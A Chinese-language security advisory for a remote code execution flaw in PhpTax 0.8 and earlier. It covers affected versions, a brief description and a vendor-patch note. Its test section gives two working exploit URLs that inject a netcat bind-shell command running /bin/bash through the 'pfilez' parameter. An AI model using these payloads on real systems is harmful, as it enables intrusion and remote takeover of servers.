PhpTax 0.8及之前版本远程代码执行漏洞

文章由LinuxBoy分享于2019-04-02 06:04:08热评（212）

发布日期：2012-10-15
更新日期：2012-10-18

受影响系统：
sourceforge PhpTax <= 0.8
描述：
--------------------------------------------------------------------------------
PhpTax是美国收入所得税计算软件。

PhpTax在实现上存在安全漏洞，可被利用导致远程代码执行攻击。

<*来源：Jean Pascal Pereira
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Bindshell on port 23235 using netcat:

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

建议：
--------------------------------------------------------------------------------
厂商补丁：

sourceforge
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://jocr.sourceforge.net/index.html

推荐文章：